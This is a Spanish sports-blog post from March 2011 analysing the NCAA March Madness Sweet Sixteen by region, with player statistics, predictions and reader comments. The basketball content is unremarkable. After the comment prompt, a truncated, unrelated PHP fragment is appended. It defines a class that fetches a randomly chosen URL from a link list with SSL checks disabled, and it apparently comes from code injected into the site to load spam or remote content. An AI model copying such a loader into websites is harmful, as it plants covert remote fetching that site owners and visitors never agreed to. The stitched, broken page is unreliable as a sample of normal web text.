Sweet Sixteen

21 de March de 2011 por kantonyo

A continuación y en colaboración con Txusma (SouthEast y SouthWest) analizamos lo que está ocurriendo en el March Madness 2011 donde ya sólo quedan 16 equipos en liza:

East RegionaL (Newark, NJ)

Ohio State ha empezado el March Madness a todo gas con dos victorias por más de 30 puntos. En primera ronda, contra los Roadrunners de UTSA, el escolta William Buford fue el mejor de los Buckeyes con 18 puntos, 6 rebotes y 5 asistencias. Jared Sullinger, candidato a los puestos más altos del draft, tuvo un partido muy cómodo anotando 11 puntos, capturando 9 rebotes y 3 recuperaciones. También destaca la buena labor del alapívot de primer año, Deshaun Thomas que en veinte minutos consiguió 13 puntos y 8 rebotes. En el segundo encuentro, Ohio State se vio las caras contra George Mason que había dado la campanada contra Villanova. Los Patriots tampoco fueron rival para los Buckeyes. Esta vez el mejor del partido fue el escolta David Lighty con 25 puntos (9/10), 7 de 7 en tiros de tres puntos, 4 rebotes y 3 asistencias. Estuvo muy bien acompañado una vez más por Buford con 18 puntos y por Jared Sullinger con 18 puntos y 8 rebotes.

Los Wildcats de Kentucky vuelven otro año más al Sweet 16 tras derrotar en primera ronda con muchísimos problemas a los Tigers de Princeton de la elitista conferencia Ivy League. Brandon Knight se guardó su único lanzamiento acertado de los ocho que intentó en todo el partido para decidir la eliminatoria en el último segundo. El pívot veterano de tercer año Josh Harrellson fue fundamental para la victoria ya que se encontró muy sólo en la pintura durante todo el partido, al final acabó con 15 puntos, 10 rebotes y 4 robos. La promesa de los Wildcats este año, Terrence Jones, tuvo una actuación decente con 10 puntos. Después del mal partido del base Brandon Knight contra Princeton, el lanzamiento de la victoria le dio la confianza que necesitaba y contra los Mountaineers de West Virginia se marcó un partidazo de escándalo con 30 puntos. En esta segunda ronda, de nuevo Josh Harrellson estuvo decisivo con 15 puntos y 8 rebotes. El alero Terence Jones anotó 12 puntos y capturó 8 rebotes en un partido muy serio del probable top 15 en el próximo draft. Los Mountaineers, finalistas a cuatro el año pasado, se despidieron de la competición con un gran partido del base Joe Mazzulla con 20 puntos. El alero Kevin Jones no estuvo acertado contra Kentucky después de un buen encuentro contra Clemson donde anotó 17 puntos y capturó 9 rebotes.

Los Golden Eagles de Marquette dieron el gran sorpresón de la East Region al derrotar en Cleveland a los Orange de Syracuse. Marquette venía de ganar por 11 puntos a los Musketeers de Xavier con 19 puntos del escolta Darius Johnson-Odom. El alero Jimmy Butler con 15 puntos, 5 rebotes, 4 asistencias y 3 robos junto con el alapívot Jae Crowder fueron otros jugadores destacados en la victoria de Marquette. En la segunda ronda, contra Syracuse, los Golden Eagles se repusieron de un mal inicio de partido y consiguieron llevarse la eliminatoria por 66 a 62. Darius Johnson-Odom volvió a ser el mejor con 17 puntos, 4 asistencias y 3 robos, acompañado de nuevo por el alapívot novato Jae Crowder con 16 puntos y 7 rebotes y el alero Jimmy Butler con 10 puntos, 5 rebotes y 3 robos. En los Orange, mal partido del alapívot Rick Jackson que se tuvo que conformar con 7 puntos y 4 rebotes en 40 minutos y también para Scoop Jardine con sólo 6 puntos (2/8). Se salvó de la quema el alero Kris Joseph con 12 puntos y 9 rebotes. El mejor para Syracuse fue el escolta de primer año, Dion Waiters con 18 puntos.

North Carolina avanza a los octavos de final de la competición gracias a la victoria contra los difíciles Huskies de Washington. En un partido loco decidido en los últimos segundos, los Tar Heels doblegaron a los Huskies gracias al poder interior de la pareja John Henson y Tyler Zeller. Zeller anotó 23 puntos y capturó 5 rebotes, mientras que su pareja de pintura llegó a los 10 puntos, 10 rebotes y 4 tapones. La estrella de UNC, Harrison Barnes, estuvo brillante con 22 puntos. Magnifico partido también, el del director de juego de los Tar Heels, el base de primer año Kendall Marshall con 13 puntos, 5 rebotes y 14 asistencias. Washington estuvo muy cerca de pasar a la siguiente ronda pero un error en el saque de Justin Holiday permitió a UNC desnivelar la balanza en el último momento. Isaiah Thomas no estuvo acertado en el tiro, y se quedó en los 12 puntos (5/15) y 8 asistencias. Los Huskies habían vencido a los Bulldogs de Georgia con Isaiah decisivo con 19 puntos y 7 asistencias. En Georgia destacó la actuación del alapívot Trey Thompkins con 26 puntos (11/14) y 11 rebotes.

Ohio State (1) – Kentucky (4): Los Buckeyes han demostrado ser un equipo muy sólido en todas sus líneas y sus jugadores están muy consolidados en sus posiciones como es el caso de los escoltas Jon Diebler, David Lighty y William Buford que llevan más de tres años en la universidad. Además dispone de unos de los mejores alapívot del torneo, el freshman Jared Sullinger. Los Wildcats han tenido un año complicado después de la estampida a la NBA de muchos de sus jugadores, pero han llegado a buen nivel al torneo gracias a las dotes técnicas de John Calipari. Al ser un equipo muy joven ofrece algunas dudas, como es el caso del alero de primer año, Terrence Jones, que a pesar de tener unas actuaciones decentes no ha despuntado al nivel que se le espera. El base Brandon Knight ha dado el salto cualitativo en este torneo con sus 30 puntos contra West Virginia. Josh Harrellson tendrá la difícil papeleta de parar a Sullinger. Los Buckeyes son favoritos gracias a que dispone de una plantilla más completa y de la referencia en la pintura de Sullinger pero el talento escondido de Kentucky puede aparecer.

Marquette (11) – North Carolina (2): Tras la sorpresa de los Golden Eagles ante Syracuse sería muy precipitado pensar que Marquette no tiene nada que hacer ante North Carolina. Los Golden Eagles disponen de un trío de aleros (Johnson-Odom/Butler/Crowder) muy físicos que pueden hacer daño al ataque novato de los Tar Heels. Harrison Barnes está ante una gran oportunidad de dar el salto a los primeros puestos del draft ante la difícil papeleta de su duelo contra Darius Johnson-Odom y Jimmy Butler. La clave puede estar sin duda en el poder interior de North Carolina con Tyler Zeller y John Henson y la nula capacidad interior de Marquette para pararlos que hace más favorito a pasar de eliminatoria a los de Chapel Hill.

Pronóstico: Ohio State – North Carolina / Final Four: Ohio State

West Regional (Anaheim, CA)

Los actuales campeones, los Blue Devils de Duke, siguen al mismo ritmo que les dio el título el año pasado. Fantásticamente dirigidos por el base Nolan Smith, derrotaron con mucha comodidad a Hampton Pirates por 42 puntos de diferencia con la agradable sorpresa de la vuelta a la competición de uno de los máximos favoritos a ser el número 1 del draft, el base Kyrie Irving. Irving anotó 14 puntos y capturó 4 rebotes en los 20 minutos que estuvo en la pista. Michigan Wolverines demostró ser un buen equipo tras la gran victoria que ofrecieron ante los Volunteers de Tennessee y lo difícil que se lo pusieron a los Blue Devils en la segunda ronda. Tim Hardaway Jr demostró que de casta le viene al galgo y anotó 15 puntos con unos sensacionales últimos minutos donde puso contra las cuerdas las aspiraciones de Duke de repetir título. Mike Krzyzewski le dio la batuta del juego al joven Irving, 11 puntos (1/4), que se mostró muy espeso y a punto estuvieron de tirar por la borda una diferencia 12 puntos a falta de cinco minutos. Darius Morris que cuajó un gran partido con 16 puntos y 6 asistencias falló la última canasta que hubiera llevado el partido al tiempo extra. Kyle Singler no acaba de encontrar su mejor forma y consiguió 13 puntos (5/12), capturó 8 rebotes y repartió 4 asistencias.

Derrick Williams continúa en el torneo gracias a las difíciles victorias de los Wildcats de Arizona contra Memphis y Texas. En primera ronda, Arizona batió a Memphis gracias a los 22 puntos y 10 rebotes de Derrick que tuvo la estimable colaboración del base de segundo año, Lamont Jones, que anotó 18 puntos. Los Tigers no supieron aguantar en frenético ritmo que ofrecieron al principio del partido y cayeron por sólo dos puntos con una buena actuación de los hermanos Barton: Will (12 puntos) y Antonio (17 puntos). En segunda ronda, Arizona fue con ventaja durante todo el partido y al final los nervios pudieron costarles muy caro. De nuevo, un buen partido para Derrick Williams con 17 puntos, 9 rebotes, 3 asistencias y 3 robos, ayudado esta vez por el alero Solomon Hill con 16 puntos y 8 rebotes. Buena actuación también del base de primer año, Jordin Mayes, que en 20 minutos anotó 16 puntos. Los Longhorns que venían de vencer a Oakland con Jordan Hamilton con 19 puntos y 10 rebotes, estuvieron a punto de remontar el partido contra Arizona. J’Covan Brown con 23 puntos fue el mejor de Texas donde también destacó de nuevo Jordan Hamilton con 18 puntos y 6 rebotes.

Kemba Walker continua su personal mes de marzo de locura, con una nueva exhibición contra Cincy donde alcanzó los 33 puntos, 6 rebotes y 5 asistencias. El base no dio pie a la sorpresa contra los Bearcats que venían de arrasar a los Tigers de Missouri con Yancy Gates como jugador más decisivo con 18 puntos y 11 rebotes. Walker, que sigue creciendo en su juego y su confianza, estuvo bien arropado una vez más por el freshman Jeremy Lamb que consiguió 14 puntos y 5 rebotes. Alex Oriakhi, pívot de UConn, fue importante en labores defensivas con 11 rebotes pero necesita mejorar en ataque ya que se quedó en 4 puntos (0/6). Yancy Gates no pudo repetir su buena actuación contra Missouri y se tuvo que conformar con 11 puntos y 6 rebotes. El mejor de Cincinnati fue esta vez el alero Rashad Bishop con 22 puntos.

Los Aztecas de San Diego State continúan su periplo en el torneo. En primera ronda bastó con una buena actuación de su estrella, Kawhi Leonard, con 21 puntos y 10 rebotes para doblegar con facilidad a los Bears, donde sólo Devon Beitzel ofrecio batalla con 25 puntos. Más dificultades se encontraron ante los Owls de Temple donde tuvieron que disputar dos prórrogas para poder pasar de eliminatoria. El alapívot de los Aztecs, Billy White, continuó su gran forma con 16 puntos y 13 rebotes. San Diego State se complicó la vida al final de la segunda parte cuando ganaban cómodamente a falta de 2 minutos. Un fallo en un lanzamiento de tres puntos de Juan Fernandez, base argentino de los Owls, propició la segunda prórroga donde los Aztecs fueron muy superiores. Kawhi Leonard terminó con 16 puntos con malos porcentajes (5/14) y capturó 9 rebotes. Juan Fernandez, con 14 puntos (5-16) estuvo menos acertado que en la eliminatoria contra Penn State donde guió a su equipo con 23 puntos.

Duke (1) – Arizona (5): Los Blue Devils son claros favoritos en su enfrentamiento contra Arizona. La gran plantilla de los actuales campeones es muy superior al equipo de Derrick Williams. El base Nolan Smith está en un momento de forma espectacular y sólo la sombra de la vuelta de Kyrie Irving puede llegar a fastidiarlo. Kyle Singler no está al nivel del torneo del año pasado pero su talento no ofrece ninguna duda. La duda, en cambio puede ser la presión que recaiga sobre la joven estrella, Kyrie Irving. En este tipo de circunstancias que mejor que uno de los mejores entrenadores del país, Mike Krzyzewski para gestionarlo. Seth Curry, hermano pequeño del jugador de Warriors también puede ser clave gracias a su tiro exterior. En Arizona sólo las ganas y el talento de Derrick pueden hacer frente al gran equipo que es hoy día la Universidad de Duke.

Connecticut (3) – San Diego State (2): La mejora que ha tenido UConn en las últimas semanas les proporciona un leve favoritismo en un partido muy igualado. Kemba Walker está siendo el mejor jugador de la NCAA en este momento y además está teniendo la ayuda del joven Jeremy Lamb y el pívot Alex Oriakhi. Por su parte, los Aztecas tienen una plantilla más completa donde destaca el alero Kawhi Leonard que promedia 18 puntos y 10 rebotes en el March Madness. San Diego State ha ganado sus partidos con autoridad y sólo cuenta con dos derrotas en todo el año, ambas contra BYU, a los cuales derrotaron en la final de la conferencia Mountain West. El alapívot Billy White lleva tres encuentros por encima de los 12 rebotes y tendrá un bonito duelo con Alex Oriakhi.

Pronóstico: Duke – Connecticut / Final Four: Duke

Southwest Regional (San Antonio, TX)

Muchas sorpresas en la Southwest Region. De los 4 primeros cabezas de serie tan solo Kansas ha cumplido los pronósticos y parece tener el camino franco para acceder sin muchos problemas a la Final Four. De la mano de los gemelos Morris, los Jayhawhs han superado de manera clara tanto a Boston University, en primera ronda, como a Illinois. Estos habían superado a su vez a la Universidad de Nevada gracias a un excepcional Mike Davis.

Ahora se enfrentarán a Richmond en un partido en el que no deberían tener muchos problemas. Los Spiders vencieron cómodamente a los Eagles de Morehead State y es que en los 2 duelos de primera ronda celebrados en Denver saltó la sorpresa. El equipo de Kenneth Faried liquidó a Lousiville con un triple de Demonte Harper a falta de 4 segundos para el final. En la última jugada el mismo Faried (que acabó el partido con 12 puntos y 17 rebotes) bloqueó el intento de canasta de Mike Marra para llevarse el partido. Por su parte, Richmond se llevó la victoria gracias en buena parte al gran partido de Kevin Anderson, autor de 25 puntos, 16 de ellos en la segunda parte. Era la tercera ocasión consecutiva que Vanderbilt caía en primera ronda ante un rival teóricamente inferior. Jeff Taylor (primera ronda según algunos mockdraft) cuajó una actuación horrible con 1 de 10 en tiros de campo.

En la otra parte del cuadro, más sorpresas. VCU y Florida State se enfrentarán por una plaza entre los Elite Eight después de eliminar a los teóricos favoritos. Virginia ya había eliminado a los Hoyas en primera ronda pero la gran machada la llevó a cabo contra los Boilermakers de Purdue, la universidad de JaJuan Johnson. Este cuajó un muy buen partido (25 puntos y 12 rebotes) pero nada pudo hacer ante el empuje de los Rams que acabaron venciendo de 18.

Por su parte, los Seminoles de Florida State se impusieron a Notre Dame, el equipo de Ben Hansbrough. La defensa funcionó a la perfección dejando a los Irish en un 31.7% de acierto en el tiro y en ataque se mostraron muy consistentes de la mano de Bernard James, el sustituto de Chris Singleton que juega aunque continúa tocado.

Kansas (1) – Richmond (12): Los Jayhawks son los claros favoritos para meterse entre los 8 mejores equipos pero no han de despistarse. Deberán vigilar muy de cerca a Justin Harper, el mejor jugador de los Spiders y uno de los más eficientes del país. Si los gemelos Morris pueden imponer su juego todo será más fácil pero Richmond ya ha demostrado que es capaz de minimizar el impacto de buenos jugadores interiores.

Virginia Commonwealth (11) – Florida State (10): Los Seminoles son uno de los mejores equipos defensivos del país y con tiempo para prerarar el choque serán temibles en este aspecto. Además estos días de descanso le vendrán de perlas a Chris Singleton que puede ser de gran ayuda saliendo desde el banco. De todas maneras la facilidad con la que VCU liquidó a Purdue da muestras de su buen potencial ofensivo, con un juego muy diversificado. Florida State será un rival más duro pero ni mucho menos fuera del alcance de los Rams.

Pronóstico: Kansas– VCU / Final Four: Kansas

SouthEast Regional (New Orleans, LA)

¿Camino de otra bella historia por parte de Butler? Dos partidos, dos finales agónicos resueltos por Matt Howard. Si el primer día, Howard anotó un buzzer-beater tras rebote ofensivo para imponerse a Old Dominion, en segunda ronda anotó un tiro libre a falta de 0.8 segundos que certificaba la victoria de los Bulldogs sobre Pittsburgh, el mejor equipo de la SouthEast. El final del partido fue esperpéntico:  Shelvin Mack (30 puntos) cometió una falta innecesaria a media pista que daba a los Panthers la oportunidad de ganar y Nasir Robinson cometió otra aún más innecesaria y completamente estúpida sobre Matt Howard al luchar por el rebote y que a la postre significaría la derrota del equipo de Gilbert Brown, el mejor con 24 puntos.

Ahora Butler se enfrentará a Wisconsin que venció a Kansas State a pesar de los 38 puntos de Jacob Pullen. Y lo consiguieron a pesar del mal partido de Jordan Taylor que falló 14 de sus 16 intentos. De todas maneras, Taylor fue clave en los segundos finales anotando 2 tiros libres y taponando el postrero intento de Pullen por empatar el partido. En primera ronda, el base de los Wildcats ya había sido el mejor de su equipo a pesar de perderse el último entrenamiento antes de la March Madness. Por su parte Wisconsin no había tenido problemas en deshacerse de Belmont, con Jon Leuer como jugador más destacado.

En la otra parte del cuadro todo se desarrolló siguiendo prácticamente el guion previsto. La única ligera sorpresa vino por parte de Gonzaga que se merendó a St. John con más facilidades de las previstas. En segunda ronda, los Bulldogs cayeron ante Jimmer Fredette y sus Cougars. El escolta de Brigham Young se cascó 31 puntos en su primer partido frente a Wofford y 34 en el segundo, con un fantástico 7 de 12 en triples.

Ahora Fredette se verá las caras con los Florida Gators. Estos se impusieron en primera ronda a Santa Barbara con Chandler Parsons rozando el triple doble (10-7-10) y en segunda a UCLA con un gran partido del pequeño base, Erving Walker, autor de 10 de los últimos 12 puntos de su equipo. UCLA llegaba tras imponerse a Michigan State por 2 puntos después de llegar a ganar de 23. Una horrible serie de lanzamientos desde el tiro libre casi le cuesta un disgusto a Tyler Honeycutt y compañía. Por los Spartans, triple doble de Draymond Green (23-11-10).

Butler (8) – Wisconsin (4): La moral de los Bulldogs está por la nubes después de dos espectaculares victorias resueltas en los últimos segundo. Pero la “suerte” no puede durar tanto. El duelo Howard-Leuer será clave en la zona y también la defensa exterior de los Badgers frente Shelvin Mack. El partido puede caer para cualquiera de los 2 lados.

Brigham Young (3) – Florida (2): Parece complicado que Jimmer Fredette pueda batir, prácticamente solo, a un equipo de la profundidad y la experiencia de los Florida Gators. Eso sí, si hay un jugador capaz de poner un partido patas arriba, ese es él. A vigilar a Erving Walker que ha cuajado un fin de semana magnífico.

Pronóstico: Wisconsin – Florida / Final Four: Florida

Comenta

10 comentarios a esta entrada

  1. portu dice:
    #1

    Magnífico resumen una vez más, me quedo impresionado pq no suelo encontrar fácilmente la información NCAA.
    Sólo pude ver los últimos 20 minutos del Duke-Michigan, un partido q parecía cómodo para los primeros, pero con las dificultades q tuvieron para atacar la zonita de los de Michigan fueron perdiendo ventaja y al final casi palman. Hubo momentos q se olvidaron de atacar el aro y eso les pasó factura. En cuanto a nombres propios canela fina Nolan Smith, no sé si en la NBA podría jugar de escolta, lo dudo, pero de PG no se manejaba mal cuando K. Irving no estaba en pista. Tim Hardaway no estuvo mal, parece q no es demasiado atlético pero ya se le nota con la picardía q le debe venir de forma hereditaria. Y a Singler se le ve desaparecido por momentos, pero tiene mucha clase, hizo una jugada en momentos importantes bastante guapa con un reverso y falta adicional, supongo q al nivel NCAA no se le notará tanto, pero tampoco me pareció verle tan limitado en cuanto a capacidad atlética como se dice en los mockdraft.

      Citar

  2. TheDeerHunter dice:
    #2

    ¿Qué es lo que ha cambiado desde el otro día para que en la East des ahora a Ohio como final4 en detrimento de North Carolina? ¿Y Florida sobre BYU??

    Increíble trabajo, chicos.

      Citar

  3. Txusma dice:
    #3

    Se nota que Regiones ha comentado Kantonyo y cuáles yo, verdad?

    He apostado por Florida pq me han parecido un equipo muy sólido y enfrente tienen “tan solo” a Jimmer Fredette. Muy bueno partido tendría que hacer para vencer a los Gators.

      Citar

  4. TheDeerHunter dice:
    #4

    Lo había pensado, pero la cuestión Ohio-North Carolina es exclusivamente para Kantonyo.

    Ojo que la pregunta no pretende pillaros. Es simple curiosidad sobre el tema… a ver si váis a pensar que ni siquiera os leo.

      Citar

  5. Viva_Dirk dice:
    #5

    A mi Ohio me parece un equipo mas compacto y Sullinger le va a dar mucho mucho trabajo a Zeller&Henson, para mi la clave puede estar en si Harrison Barnes rinde a su máximo nivel, si lo hace va a ser muy dificil que NC no llegue a la FF y sea el favorito junto a Duke.

    De cara al draft parece que Derrick Williams se esta ganando a pulso el Nº1 porque de Kemba Walker siempre dudará mas la gente, por muy jugón que sea.

      Citar

  6. kantonyo dice:
    #6

    Tienes razón Deer, prometo que lo he hecho basandome en las sensaciones de cada momento. Los Buckeyes me han transmitido muchísima seguridad en sus dos eliminatorias, es verdad que ha tenido rivales más cómodos. Lo de confiar en UNC para la final four en el analisis anterior fue más por que me gusta el equipo que han montado los Tar Heels, me parece muy interesante para la NBA el base Kendall Marshall, pero es una plantilla muy inexperta. De todos modos, no me sorprendería ningún resultado, bueno quizas el único sería una paliza de UNC a Ohio State.

    Comparto la opinión de Dirk respecto a lo de Walker y Derrick, ahora mismo está más alto que al comienzo del March Madness y aunque Walker gane el campeonato el solito, habrá siempre dudas por su irregularidad.

    Parece que poco a poco se están consolidando buenos jugadores como Williams, Walker, Sullinger, Barnes, Fredette, Leonard, Singler, Henson, Zeller, Marshall, Nolan Smith, Morris’s, Knight … Y luego en el NIT tambien lo están haciendo muy bien Alec Burks en Colorado, John Shurna en Northwestern, Tony Mitchell en Alabama …

    Al final no pinta tan mal el draft de este año….

      Citar

  7. Viva_Dirk dice:
    #7

    Respecto a Fredette, dudo mucho que nadie se haga ilusiones con el, ya que Redick era un dios en la NCAA y en la NBA es lo que es.

      Citar

  8. luigi_sal dice:
    #8

    q bueno es alec burks, ahora q lo mencionáis. y creo q keith benson y kenneth faried tb tendrán sitio en la NBA, aunq sea como cuartos hombres de zona. no me creo q no estén por encima de tíos como jared jeffries, chuck hayes, los collins o joel anthony

      Citar

  9. TheDeerHunter dice:
    #9

    A Chuck Hayes yo no lo incluiría en ese grupo… En Houston no creo que haya nadie que pueda quejarse de su rendimiento.

      Citar

  10. Txusma dice:
    #10

    Esta ha empezado ya!!

    De momento, sorpresa con la eliminación de Duke por parte de Arizona (o debería decir Derrick Williams?). 32 puntos, 13 rebotes con 5 de 6 en triples el animalito. Enfente un gran Kyrie Irving (y eso que va a medio gas por la lesión) y un buen Kyle Singler. Nolan Smith desapareció en el peor momento.

    Otro que sigue saliéndose es Kemba Walker. Con la ayuda de Jeremy Lamb planta a UConn en la Elite Eight. Aparte de estos 2, los Huskies son muy poquita cosa. El duelo Williams-Walker promete.

    Victorias también de Butler sobre Wisconsin, un tanto aburrida, pq no fue en el último segundo, y de Florida sobre BYU. Como dije, los Gators eran mucho equipo para Fredette. Por cierto, no creo que se coma un colín en la NBA.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>